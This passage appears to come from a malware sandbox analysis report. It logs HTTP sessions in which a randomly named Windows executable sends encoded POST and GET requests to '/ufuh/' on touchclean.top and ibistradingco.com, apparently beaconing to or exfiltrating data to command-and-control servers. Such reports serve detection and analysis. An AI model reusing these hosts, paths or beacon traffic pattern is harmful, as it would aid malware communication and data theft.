32 31 62 46 2b 34 41 79 4e 72 64 4a 39 46 39 4d 31 56 4f 39 67 68 4a 36 47 62 6d 78 41 6c 36 75 4b 4b 46 6b 5a 45 31 62 62 48 70 55 4a 62 63 68 4d 49 43 6e 51 6c 39 39 4e 36 43 7a 75 43 47 4e 6f 35 42 6a 71 38 77 39 2f 4d 4c 44 36 78 77 2f 57 47 71 62 4f 58 34 4f 5a 34 61 4d 30 36 66 56 2b 7a 70 76 72 63 39 62 62 36 39 45 66 6e 52 73 50 74 35 73 53 45 66 74 59 43 35 5a 2b 31 2f 31 6c 73 57 58 4c 61 32 46 41 75 5a 33 52 2f 48 79 37 [TRUNCATED] Data Ascii: ZXdp=N+3wcJpCUieQL3gORFWCd55O3/5sKNnV0hQ0FS9CCLdi7R3xIGP5TpUgcIdS3UZO3dGeqYarl0nwOWw7R5MP5TYsCWmwofLCoJM7lPsATU3GJ0OZoMz75XXtZ088u3s8xU24WdqJjG7bydcGeRnnrFmSrrt+A/gkJ579ozu+OfqtG+uGeY5Es0ZDaBD021bF+4AyNrdJ9F9M1VO9ghJ6GbmxAl6uKKFkZE1bbHpUJbchMICnQl99N6CzuCGNo5Bjq8w9/MLD6xw/WGqbOX4OZ4aM06fV+zpvrc9bb69EfnRsPt5sSEftYC5Z+1/1lsWXLa2FAuZ3R/Hy7WESbOz1rZEFypABPCaGayEwAKBD8xd60o+ipvesA9BfzY7jt9dL3paNfQADDGYgWP8Hc3iTrWR5knMZGM5G49+2PMnJIPiBJU90dam3KpYG9bFexFA8Ly4vAcFGwtMaKc4EQKzdEazV+rD9QLK7EEg2nPUVjaoQs0LTtNpoo7r5alOIAe6b9nkaa41uYAuXVsR80T5O1rkf6cstYxWCHdilWPE1jLFrfeq7NktM4fU27RdtFDX6kkunYeBRqbedpYg9gJdgjUxwokMm8GsDzLXYw496nor6ZuYD1HI4paFEOJLTWrrsB6MxTAXdE6uWtDfB0AKWqIjd740xhb8CyuS246kKYkY7rzZR5r9lj+JioYeLI5YDKjaHr7LtkiwxkpGPAEu8zQbitnPS+zeebPkqjWJ52bqPqrMM4iI+ePTFSZikjGtgl3P0K7XgB2DwGUaId+gCePcO7KxKlH6ldu16rRzpEdgY/1QNVKucSq4MXcv63hzHSBghooxq96g/ljmja3wt6v3vUB2kEelZZ3HvIyG1ORdR4pHh59LNVoQujcbMQltmBNDoGl9suF+3IuFVSRXntsrfGataSeb/xqy293xPwed1IAQs0ce2wDgLmwE7omMa7iaCN0krGqLhe61OzOTj9Sqi1gkuQp0Xj8fxy28I30/z17e [TRUNCATED]
Jun 3, 2024 08:53:51.549230099 CEST	217	OUT	Data Raw: 47 49 65 30 58 76 32 79 36 4a 46 38 79 6d 4d 70 67 65 33 76 71 73 54 33 42 38 33 71 2f 57 52 7a 59 6e 4d 47 62 4f 32 61 52 2b 4d 54 68 79 63 37 2f 53 44 71 62 73 59 56 5a 4a 30 65 42 45 4c 67 35 69 6a 74 2f 5a 47 75 64 37 45 47 35 46 2f 47 79 67 Data Ascii: GIe0Xv2y6JF8ymMpge3vqsT3B83q/WRzYnMGbO2aR+MThyc7/SDqbsYVZJ0eBELg5ijt/ZGud7EG5F/Gygat8WHzmOVdNmXOR81QWGCjjsfMCBShMWU1vqPvU7YWqBvV9DAXz9Kq63HLTQUsj5p+f7Vt7ZsHyu/EZeYRwcJdpAtBPg74A1BTXpfwpicfs+UEtBYWbY1SauNxBES9zLrT68s6r
Jun 3, 2024 08:53:52.317584038 CEST	169	IN	HTTP/1.0 500 Internal Server Error Date: Mon, 03 Jun 2024 06:53:52 GMT Server: Apache Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.22	49185	67.223.117.189	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:54.076066017 CEST	728	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 201 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.touchclean.top Origin: http://www.touchclean.top Referer: http://www.touchclean.top/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4e 2b 33 77 63 4a 70 43 55 69 65 51 4c 77 30 4f 54 51 71 43 4d 70 35 4f 36 66 35 73 42 74 6e 54 30 68 64 4a 46 57 6c 73 42 36 56 69 37 41 48 78 49 55 6e 35 65 4a 55 6a 53 6f 64 57 7a 55 5a 62 33 64 47 34 71 5a 6d 72 6c 30 44 77 55 31 49 37 59 63 73 4f 37 6a 59 75 50 32 6d 7a 6f 66 33 78 6f 4a 42 6c 6c 50 30 41 54 55 48 47 49 33 32 5a 74 76 4c 37 39 6e 57 6d 52 55 38 52 75 33 78 6b 78 55 6d 4b 57 63 57 4a 6a 7a 6a 62 79 4d 38 47 55 69 50 6e 69 6c 6d 54 6c 4c 74 70 4f 71 42 56 47 5a 69 32 68 53 47 47 48 4f 66 4f 46 74 57 38 58 35 68 76 76 47 30 75 56 32 71 73 31 55 47 39 71 67 3d 3d Data Ascii: ZXdp=N+3wcJpCUieQLw0OTQqCMp5O6f5sBtnT0hdJFWlsB6Vi7AHxIUn5eJUjSodWzUZb3dG4qZmrl0DwU1I7YcsO7jYuP2mzof3xoJBllP0ATUHGI32ZtvL79nWmRU8Ru3xkxUmKWcWJjzjbyM8GUiPnilmTlLtpOqBVGZi2hSGGHOfOFtW8X5hvvG0uV2qs1UG9qg==
Jun 3, 2024 08:53:54.852638006 CEST	169	IN	HTTP/1.0 500 Internal Server Error Date: Mon, 03 Jun 2024 06:53:54 GMT Server: Apache Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.22	49186	67.223.117.189	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:56.601099014 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 3625 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.touchclean.top Origin: http://www.touchclean.top Referer: http://www.touchclean.top/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 4e 2b 33 77 63 4a 70 43 55 69 65 51 45 77 45 4f 66 58 2b 43 63 35 35 4e 2f 66 35 73 4b 4e 6e 58 30 68 52 4a 46 53 39 43 43 4a 35 69 37 54 54 78 4d 47 50 35 53 70 55 6a 55 6f 64 53 33 55 5a 4e 33 64 43 30 71 59 57 52 6c 32 76 77 4f 55 59 37 52 2f 45 50 30 44 59 73 64 47 6d 79 6f 66 32 72 6f 4a 52 36 6c 4f 41 6d 54 55 66 47 49 43 43 5a 71 66 4c 36 79 48 57 6d 52 55 38 64 75 33 78 49 78 55 2b 53 57 59 36 6a 6a 42 4c 62 79 74 63 47 59 68 6e 67 67 6c 6d 58 76 72 74 34 41 2f 6c 46 4a 35 36 30 6f 7a 71 59 4f 66 6d 74 45 74 32 47 65 62 68 44 75 6b 5a 43 65 42 44 30 34 56 62 48 2b 34 41 2b 4e 72 64 4a 39 46 42 4d 31 46 4f 39 67 6c 6c 35 65 37 6d 78 44 6c 36 5a 4f 4b 41 66 5a 45 78 35 62 48 34 72 4f 73 6b 68 50 4f 75 6e 55 56 39 39 45 71 43 31 75 43 47 36 69 5a 42 5a 71 34 64 41 2f 49 75 47 36 78 77 2f 57 46 79 62 64 56 67 4f 65 6f 61 4d 35 61 66 59 6e 6a 70 73 72 63 35 74 62 36 35 45 66 6d 35 73 56 2f 68 73 62 6d 33 75 41 69 35 59 36 31 2f 7a 7a 63 57 43 4c 61 72 51 41 74 35 64 52 2b 33 79 37 [TRUNCATED] Data Ascii: ZXdp=N+3wcJpCUieQEwEOfX+Cc55N/f5sKNnX0hRJFS9CCJ5i7TTxMGP5SpUjUodS3UZN3dC0qYWRl2vwOUY7R/EP0DYsdGmyof2roJR6lOAmTUfGICCZqfL6yHWmRU8du3xIxU+SWY6jjBLbytcGYhngglmXvrt4A/lFJ560ozqYOfmtEt2GebhDukZCeBD04VbH+4A+NrdJ9FBM1FO9gll5e7mxDl6ZOKAfZEx5bH4rOskhPOunUV99EqC1uCG6iZBZq4dA/IuG6xw/WFybdVgOeoaM5afYnjpsrc5tb65Efm5sV/hsbm3uAi5Y61/zzcWCLarQAt5dR+3y7U8SZvz1rJEGo5AFeSWCaxkOAKE08zZ629GijN2rcdBd0Y7lgddQ3puvfQgDC04gRMkHYE6QsmR+yXMoMs5S496uPN3ZI9qBIk90d5e0VJYJ37FEq1BjLy47Ae9wxZAaKcoERfHdEazW7rD/ZrWZEEsynOsFjfkQskbTtPRog7r5SFPBSe7q9kYsa4t+YQ6XUPJ82RRO9rkK28ssXRWbHdylWKFojLtrf/q7c2VMhPVeyxdEFDWBkkqrYeRBqZ6dpaY9x9pgt0xx70Mi4Gt1zLfIw4pAnpT6ZP4D5WI4o6F8TZLTZLr0B6UhTCTrE7mWtyPBlwKRnojc9I02q78qyuC246oKYkg7rCZRvIVl+eJgn4erRJUVKjK1r7i2kngxnb+PWSaz2gbg73PE1Te6bPlrjSFp2v2Pze4M7DI5RPTCEpio+WtEl3/OK/rwBBrwGUqIdrUCf/cO7KxFlH6hdu4LrUfDEdgY+h8NU42cK65nY8uklRzJSBkXoopE96M/l2qja3wi3/3sMR2jEegzZ3HRIyK1NnFR47Ph5bfNC4Quz8bNCltnBND4GkwruBq3JelVTT/kxMraWqsZFOXgxq2u92lP3pl1IRQs0se25DgUtQEunGxb7ivpN107TPXhMZNOxNrgoyqn6AkWQp4Sj8X5yz8+32Pz0be [TRUNCATED]
Jun 3, 2024 08:53:56.606054068 CEST	1681	OUT	Data Raw: 46 4b 75 30 57 6f 32 79 48 51 56 38 51 6d 4d 6f 52 65 32 7a 4d 73 54 44 42 37 6c 69 2f 47 41 7a 59 6e 63 47 5a 48 57 62 4e 36 4d 66 4a 79 63 48 7a 53 44 36 68 73 74 5a 5a 49 46 69 42 50 5a 59 35 78 54 74 38 57 57 75 4d 37 45 4b 64 46 2f 57 55 67 Data Ascii: FKu0Wo2yHQV8QmMoRe2zMsTDB7li/GAzYncGZHWbN6MfJycHzSD6hstZZIFiBPZY5xTt8WWuM7EKdF/WUgbdaWzjmPldNr02Wq1QQBCjUsfMqBSpIWWBBqK7U7a+qAfV+EwWZ4Kq83CT+QUkJ5puf7UR7ZInyp/EZR4RpUpc9DddAg/1QkEfSoPUUmMrK9lg0JZGkeUi4rfV5RUcHY/TIt8Po3sFAiHJqWq5Ks7QadhBzJc5PfD
Jun 3, 2024 08:53:57.380822897 CEST	169	IN	HTTP/1.0 500 Internal Server Error Date: Mon, 03 Jun 2024 06:53:57 GMT Server: Apache Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.22	49187	67.223.117.189	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:53:59.127893925 CEST	463	OUT	GET /ufuh/?ZXdp=A8fQf/hISgzwL3oVRnqHbZBV/plXIsny1TYZTQxVDrtx1SbFVUn9YIU/QNlk/lJ+xLSyvfTMvWvwfwkJSN9/6ikOA0zWpJ/i6bk9+sgLcEv6BHfAlNSdkle4dEVn&7jsp7=zz9xHbtX HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Connection: close Host: www.touchclean.top User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jun 3, 2024 08:53:59.910418034 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 03 Jun 2024 06:53:59 GMT Server: Apache Content-Length: 32106 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Fables"> <meta name="author" content="Enterprise Development"> <link rel="shortcut icon" href="assets/custom/images/shortcut.png"> <title> 404</title> ... animate.css--> <link href="assets/vendor/animate.css-master/animate.min.css" rel="stylesheet"> ... Load Screen --> <link href="assets/vendor/loadscreen/css/spinkit.css" rel="stylesheet"> ... GOOGLE FONT --> <link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i" rel="stylesheet"> ... Font Awesome 5 --> <link href="assets/vendor/fontawesome/css/fontawesome-all.min.css" rel="stylesheet"> ... Fables Icons --> <link href="assets/custom/css/fables-icons.css" rel="stylesheet"> ... Bootstrap CSS --> <link href="assets/vendor/bootstrap/css/boo [TRUNCATED]
Jun 3, 2024 08:53:59.910448074 CEST	212	IN	Data Raw: 2f 62 6f 6f 74 73 74 72 61 70 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2d 34 2d 6e 61 76 62 61 72 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 41 4e 43 59 20 42 4f 58 20 2d 2d 3e 0a 20 20 Data Ascii: /bootstrap/css/bootstrap-4-navbar.css" rel="stylesheet"> ... FANCY BOX --> <link href="assets/vendor/fancybox-master/jquery.fancybox.min.css" rel="stylesheet"> ... OWL CAROUSEL --> <link href="
Jun 3, 2024 08:53:59.910487890 CEST	1236	IN	Data Raw: 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6f 77 6c 63 61 72 6f 75 73 65 6c 2f 6f 77 6c 2e 63 61 72 6f 75 73 65 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 Data Ascii: assets/vendor/owlcarousel/owl.carousel.min.css" rel="stylesheet"> <link href="assets/vendor/owlcarousel/owl.theme.default.min.css" rel="stylesheet"> ... Timeline --> <link rel="stylesheet" href="assets/vendor/timeline/timeline.css
Jun 3, 2024 08:53:59.910563946 CEST	1236	IN	Data Raw: 73 3d 22 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 6b 2d 63 68 69 6c 64 20 73 6b 2d 64 6f 75 62 6c 65 2d 62 6f 75 6e 63 65 31 22 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 Data Ascii: s="sk-double-bounce"> <div class="sk-child sk-double-bounce1"></div> <div class="sk-child sk-double-bounce2"></div> </div></div>... Start Top Header --><div class="fables-forth-background-color fables-top-header-signin"> <di
Jun 3, 2024 08:53:59.910581112 CEST	1236	IN	Data Raw: 61 67 22 20 63 6c 61 73 73 3d 22 6d 72 2d 31 22 3e 20 46 72 65 6e 63 68 3c 2f 61 3e 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 Data Ascii: ag" class="mr-1"> French</a> </div> </div> </div> <div class="col-12 col-sm-5 col-lg-4 text-right"> <p class="fables-third-text-color font-13"><span cl
Jun 3, 2024 08:53:59.910670996 CEST	636	IN	Data Raw: 70 73 65 22 20 64 61 74 61 2d 74 61 72 67 65 74 3d 22 23 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 66 61 62 6c 65 73 4e 61 76 44 72 6f 70 64 6f 77 6e 22 20 61 72 69 61 2d 65 78 70 61 6e Data Ascii: pse" data-target="#fablesNavDropdown" aria-controls="fablesNavDropdown" aria-expanded="false" aria-label="Toggle navigation"> <span class="fables-iconmenu-icon text-white font-16"></span>
Jun 3, 2024 08:53:59.910732985 CEST	1236	IN	Data Raw: 22 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 48 6f 6d 65 0a 20 20 20 20 20 20 20 20 Data Ascii: " aria-expanded="false"> Home </a> <ul class="dropdown-menu" aria-labelledby="sub-nav1">
Jun 3, 2024 08:53:59.910800934 CEST	1236	IN	Data Raw: 2d 74 6f 67 67 6c 65 22 20 68 72 65 66 3d 22 23 22 3e 48 65 61 64 65 72 73 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 75 6c 20 Data Ascii: -toggle" href="#">Headers</a> <ul class="dropdown-menu"> <li><a class="dropdown-item dropdown-toggle" href="#">Header 1</a>
Jun 3, 2024 08:53:59.910816908 CEST	424	IN	Data Raw: 65 61 64 65 72 32 2d 74 72 61 6e 73 70 61 72 65 6e 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 32 20 54 72 61 6e 73 70 61 72 65 6e 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: eader2-transparent.html">Header 2 Transparent</a></li> <li><a class="dropdown-item" href="header2-light.html">Header 2 Light</a></li>
Jun 3, 2024 08:53:59.910875082 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 Data Ascii: </li> <li><a class="dropdown-item dropdown-toggle" href="#">Header 3</a> <ul class="dropdown-menu">
Jun 3, 2024 08:53:59.915451050 CEST	1236	IN	Data Raw: 74 2e 68 74 6d 6c 22 3e 48 65 61 64 65 72 20 34 20 4c 69 67 68 74 3c 2f 61 3e 3c 2f 6c 69 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: t.html">Header 4 Light</a></li> <li><a class="dropdown-item" href="header4-dark.html">Header 4 Dark</a></li> </ul>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.22	49188	89.116.109.159	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
Jun 3, 2024 08:54:05.092258930 CEST	2472	OUT	POST /ufuh/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Length: 2161 Cache-Control: no-cache Connection: close Content-Type: application/x-www-form-urlencoded Host: www.ibistradingco.com Origin: http://www.ibistradingco.com Referer: http://www.ibistradingco.com/ufuh/ User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 5a 58 64 70 3d 73 65 78 33 33 46 31 2b 79 4d 4a 67 4d 69 55 73 53 31 6a 58 4c 45 50 45 2f 37 56 75 32 6e 7a 49 4e 56 33 46 6f 78 52 37 58 6e 53 6e 50 68 38 6f 59 57 62 7a 30 6d 48 70 76 5a 43 59 54 48 63 30 2b 4d 33 55 56 38 75 4a 78 73 72 53 6f 73 45 49 44 4f 4a 50 51 37 59 31 67 43 38 77 72 70 31 2f 71 4c 4f 50 6b 63 62 49 4f 4b 68 48 32 41 31 4d 61 39 52 66 4c 2f 4a 45 45 68 50 75 51 34 68 59 78 62 64 6c 2b 2b 76 57 4e 38 65 4d 4d 73 57 69 4d 44 71 7a 4f 6e 70 6f 2b 61 73 2b 67 59 48 62 31 6c 2f 70 49 46 61 51 52 7a 74 2f 5a 30 39 64 45 62 57 6e 74 65 74 31 31 37 79 68 73 49 67 42 77 67 72 47 52 42 67 6b 4a 43 67 54 76 6a 48 69 62 34 31 70 4d 77 4b 56 76 70 2f 4c 6b 34 35 59 47 66 48 39 4a 41 65 44 75 72 48 46 63 53 43 56 4e 54 33 37 51 42 52 61 6a 6a 64 38 32 4a 36 2f 45 30 4d 38 6e 38 32 38 38 69 33 48 34 4a 34 75 4b 65 35 46 53 6c 78 50 55 69 51 2f 75 48 45 39 58 35 58 57 43 72 6e 41 4b 52 68 74 78 51 55 73 59 4e 51 46 46 61 71 69 58 56 51 50 72 35 79 77 43 33 75 58 38 6e 76 61 76 6d 45 35 50 [TRUNCATED] Data Ascii: ZXdp=sex33F1+yMJgMiUsS1jXLEPE/7Vu2nzINV3FoxR7XnSnPh8oYWbz0mHpvZCYTHc0+M3UV8uJxsrSosEIDOJPQ7Y1gC8wrp1/qLOPkcbIOKhH2A1Ma9RfL/JEEhPuQ4hYxbdl++vWN8eMMsWiMDqzOnpo+as+gYHb1l/pIFaQRzt/Z09dEbWntet117yhsIgBwgrGRBgkJCgTvjHib41pMwKVvp/Lk45YGfH9JAeDurHFcSCVNT37QBRajjd82J6/E0M8n8288i3H4J4uKe5FSlxPUiQ/uHE9X5XWCrnAKRhtxQUsYNQFFaqiXVQPr5ywC3uX8nvavmE5PXvFq1Us6hmw7eSsbAOMMJrtev8cb1kLe+IvwCjRLoyl0oSYHujGfdwwHm6qJ/X6PFdoKwYhyRXl5NG9+wYAuJPn+VdK11Hekx4SkNDuD4kTxxAGzPU8Cd9um5YWh2KKWDNofwAUiEed0PZV/sIB22QYDhJmuIAdNsfl3IpxAOebaCjN+Okq7akToXSaEcL8FjritUbd3ut6uVv+C8V/Ajgf3i7TQewMcGhM9qubh5krmy17zh6C3YmvpR3HB+iy/NoRG3PtS3XowFaKJdM4T8UABRnTeBcwZJTfrK/Zt6ZuCgoMK5nxqy9WJxYZZPB8FM8sycH8fwa8kA4glV1jX+MwHw/zNK7VETp/BR00zp3S6lM3O52immDRmnw+MtpvIhd3xz6A4CDdcvlhwpT74oK1G2CfwPjXg4y2gi/p1vQYRLZws+cXPIpQoH9XyZGwNPWQPr4tzWvjybK0KouNrO/FQw0kCKnak/c6JzQ4UUQMfiUpRitPfI30QJfD3LAZcd+xXyMoS2C4IMd8dszKX3K0c8gPrXf/7F5jmry60pQbVWMLQrpyWPIvQLOmr2TGPNTCbEKm9XS6GgjPm0zHRZ+CKhJ1rmJuoz5bABSntwqiZLBKKH7mKI8xxov6O5k8vwHHOicivXBd8kb09pb5V2kHO81EL71lX2L [TRUNCATED]
Jun 3, 2024 08:54:05.100023031 CEST	226	OUT	Data Raw: 48 37 43 76 67 45 61 37 34 50 72 75 74 4f 5a 52 66 4a 4c 70 30 50 46 79 45 68 4e 67 63 41 39 35 68 37 48 50 61 38 73 36 67 51 56 33 70 70 6d 54 4c 51 79 6a 44 48 44 45 78 62 6a 6c 6a 34 79 4c 39 43 56 6f 45 71 62 6e 43 36 79 61 6b 75 2b 6b 74 57 Data Ascii: H7CvgEa74PrutOZRfJLp0PFyEhNgcA95h7HPa8s6gQV3ppmTLQyjDHDExbjlj4yL9CVoEqbnC6yaku+ktW04JRBT88DT2DQLijmPwKcLlhiteDqENkfQ0q7Z2cyfp3bZNbLgMWV+Mz4dXK3tmuN9bMpQvtaTEN8Z5sbI/l9j0HvStMZjyVQm/azoCc8K0PqD/LIfWFm53owv17bklnV781+6wRBuq6x/49
Jun 3, 2024 08:54:06.173213005 CEST	1216	IN	HTTP/1.1 301 Moved Permanently Server: hcdn Date: Mon, 03 Jun 2024 06:54:06 GMT Content-Type: text/html Content-Length: 795 Connection: close location: https://www.ibistradingco.com/ufuh/ platform: hostinger content-security-policy: upgrade-insecure-requests alt-svc: h3=":443"; ma=86400 x-hcdn-request-id: 768a38939b8553c01fb02a1afd40038d-fast-edge3 x-hcdn-cache-status: DYNAMIC x-hcdn-upstream-rt: 0.269 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED] Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.22	49189	89.116.109.159	80	2580	C:\Program Files (x86)\bbewLzKhTmIizyBHPfTQLVBFmUELAksPgbjusXrPyBG\sjXzOwQzEuZimVPkzDSNXdqUsvZdr.exe

Timestamp	Bytes transferred	Direction	Data
